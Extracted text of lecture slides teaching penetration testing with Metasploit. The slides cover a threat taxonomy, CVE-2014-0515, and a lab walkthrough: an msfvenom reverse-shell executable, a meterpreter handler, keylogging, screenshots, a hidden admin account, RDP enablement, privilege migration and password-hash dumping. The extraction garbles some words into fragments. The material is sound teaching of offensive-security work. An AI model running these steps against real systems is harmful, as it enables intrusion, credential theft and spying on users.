Metasploit Understand how a Pen Tester can generate vulnerabilities and test
using the Metasploit framework.
Define the options and payloads required to generate and use
vulnerabilities.
Gaining remote access.
Prof Bill Buchananhttp://asecuritysite.com
@billatnapier
Author: Prof Bill Buchanan
Meta
sp
loit
Introduction
Vu
lne
rab
ility
Th
rea
ts
Author: Prof Bill Buchanan
Pen Testing
Technical Scan
For Vulnerabilities
(eg NESSUS)
Business Scan for
Vulnerabilities
(eg Human)
White
HatWhite Hat
Adversarial Role
Social Engineering.
Password Cracking.
Data Theft.
Automated Testing
Port scanning.
Malware detection.
SQL Database Exploits.
Adverse Disclosure
Service Availability
Business
Disruption
Damage to or
Modification to
Assets
Fraud/E-Crime
Reputational
Damage
Legal and
Regulatory Censure
Risks
Malware
Hacking
Social
Misuse
Physical
Error
Environmental
Threats
Internal
External
Trusted Partner
Actor
Vuln
era
bili
tyT
hre
ats
Author: Prof Bill Buchanan
Pen Testing
Technical Scan
For Vulnerabilities
(eg NESSUS)
Business Scan for
Vulnerabilities
(eg Human)
White
HatWhite Hat
Adversarial Role
Social Engineering.
Password Cracking.
Data Theft.
Adversarial Role
Denial of Service
User Account Breach
Password Cracking
Physical Attack
Database Breach
Email Breach
SNMP Breach
Malware Install
Web Comprise
Backdoor Install
Spyware Install
SCADA Compromise
VoIP Compromise
Cloud Compromise
Adverse Disclosure
Service Availability
Business Disruption
Damage/Modification of Assets
Fraud/E-Crime
Reputational Damage
Legal and Regulatory Censure
Risks
Vuln
era
bili
tyT
hre
ats
CVE-2014-0515
Author: Prof Bill Buchanan
CVE-ID
CVE-2014-0515
Description
Buffer overflow in Adobe Flash Player
before 11.7.700.279 and 11.8.x through
13.0.x before 13.0.0.206 on Windows
and OS X, and before 11.2.202.356 on
Linux, allows remote attackers to
execute arbitrary code via unspecified
vectors, as exploited in the wild in April
2014.
Published: 2015
CVSS Severity: 9.3 (HIGH)
http://www.cve.mitre.org
Author: Prof Bill Buchanan
Meta
sp
loit
Metasploit Framework
Runnin
g m
sfc
onsole
Me
tasplo
it
Author: Prof Bill Buchanan
Metasploit
Vulnerability (CVE)
root@kali:~# msfconsole[*] Starting the Metasploit Framework console.../ _---------. .' ####### ;." .---,. ;@ @@`; .---,..." @@@@@'.,'@@ @@@@@',.'@@@@ ".'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' "--'.@@@ -.@ @ ,'- .'--" ".@' ; @ @ `. ;' |@@@@ @@@ @ . ' @@@ @@ @@ , `.@@@@ @@ . ',@@ @ ; _____________ ( 3 C ) /|___ / Metasploit! \ ;@'. __*__,." \|--- \_____________/ '(.,...."/
Easy phishing: Set up email templates, landing pages and listenersin Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2014122301 [core:4.11.0.pre.2014122301 api:1.0.0]]+ -- --=[ 1388 exploits - 866 auxiliary - 236 post ]+ -- --=[ 342 payloads - 37 encoders - 8 nops ]+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]Msf >
Exploit generator Host under test
Vulnerability
Analysis
Generate
exploit
Runnin
g m
sfc
onsole
Me
tasplo
it
Author: Prof Bill Buchanan
Metasploit
msf > search CVE-2014-0515
Matching Modules================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/browser/adobe_flash_pixel_bender_bof 2014-04-28 normal Adobe Flash Player Shader Buffer Overflow
msf > info exploit/windows/browser/adobe_flash_pixel_bender_bof Name: Adobe Flash Player Shader Buffer Overflow Module: exploit/windows/browser/adobe_flash_pixel_bender_bof Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Rank: Normal Disclosed: 2014-04-28
Available targets: Id Name -- ---- 0 Automatic
Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Retries false no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate URIPATH no The URI to use for this exploit (default is random)
Payload information: Space: 2000
Description: This module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13 over Windows XP SP3, Windows 7 SP1 and Windows 8.
References: http://cvedetails.com/cve/2014-0515/
Ru
nn
ing m
sfc
on
so
leM
eta
splo
it
Author: Prof Bill Buchanan
Metasploit
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe
msf > use exploit/multi/handlermsf exploit(handler) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 10.200.0.208LHOST => 10.200.0.208msf exploit(handler) > set LPORT 4444LPORT => 4444msf exploit(handler) > exploit
[*] Started reverse handler on 10.200.0.208:4444 [*] Starting the payload handler...[*] Sending stage (770048 bytes) to 10.200.0.205[*] Meterpreter session 1 opened (10.200.0.208:4444 -> 10.200.0.205:49265) at 2015-01-01 16:54:07 -0500
WINEXP.EXE
Gain
ing A
dm
in a
ccess
Me
tasplo
it
Author: Prof Bill Buchanan
Metasploit
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe
meterpreter > keyscan_startStarting the keystroke sniffer...meterpreter > keyscan_dumpDumping captured keystrokes...hel <Ctrl> <LCtrl> meterpreter > keyscan_stop
meterpreter > execute -f calc.exeProcess 3780 created.
meterpreter > screenshotScreenshot saved to: /root/zJVqTTaq.jpeg
meterpreter > getuidServer username: Encase-PC1\Encase
meterpreter > sysinfoComputer : ENCASE-PC1OS : Windows 7 (Build 7601, Service Pack 1).Architecture : x64 (Current Process is WOW64)System Language : en_GBMeterpreter : x86/win32
meterpreter > getsidServer SID: S-1-5-21-3026846657-1272420173-2154099446-1000
meterpreter > ifconfigInterface 13============Name : Intel(R) PRO/1000 MT Network ConnectionHardware MAC : 00:50:56:ab:68:00MTU : 1500IPv4 Address : 10.200.0.205IPv4 Netmask : 255.255.255.0
WINEXP.EXE
Rem
ote
Deskto
pM
eta
splo
it
Author: Prof Bill Buchanan
Metasploit
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe
meterpreter > run getgui -u newuser -p pass[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez [email protected][*] Setting user account for logon[*] Adding User: hacker with Password: s3cr3t[*] Hiding user from Windows Login screen[*] Adding User: hacker to local group 'Remote Desktop Users'[*] Adding User: hacker to local group 'Administrators'[*] You can now login with the created user[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4028.rc
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez [email protected][*] Enabling Remote Desktop[*] RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*] The Terminal Services service is not set to auto, changing it to auto ...[*] Opening port in local firewall if necessary[*] For cleanup use command: run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20150101.4353.rc
0.200.0.205 - Meterpreter session 3 closed. Reason: User exitmsf exploit(handler) > exit
root@kali:~# rdesktop -u newuser -p pass 10.200.0.205WARNING: Remote desktop does not support colour depth 24; falling back to 16
WINEXP.EXE
Gain
ing A
dm
in a
ccess
Meta
splo
it
Author: Prof Bill Buchanan
Metasploit
root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=10.200.0.208 LPORT=4444 -f exe > winexp.exe
meterpreter > hashdump[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.meterpreter > getuidServer username: Encase-PC1\Encase
meterpreter > ps
Process List============
PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System x86_64 0 264 4 smss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe 364 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 372 364 csrss.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe 388 524 spoolsv.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 420 364 wininit.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe 524 420 services.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe 532 420 lsass.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe 540 420 lsm.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe 632 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 524 svchost.exe x86_64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe 788 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe 832 524 svchost.exe x86_64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 856 524 svchost.exe x86_64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
meterpreter > migrate 832[*] Migrating from 2436 to 832...[*] Migration completed successfully.meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > hashdumpAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Encase:1000:aad3b435b51404eeaad3b435b51404ee:307e40814e7d4e103f6a69b04ea78f3d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WINEXP.EXE
Metasploit Understand how a Pen Tester can generate vulnerabilities and test
using the Metasploit framework.
Define the options and payloads required to generate and use
vulnerabilities.
Understand how to test a range of devices/instances.
Using shells and callbacks.
Prof Bill Buchananhttp://asecuritysite.com
@billatnapier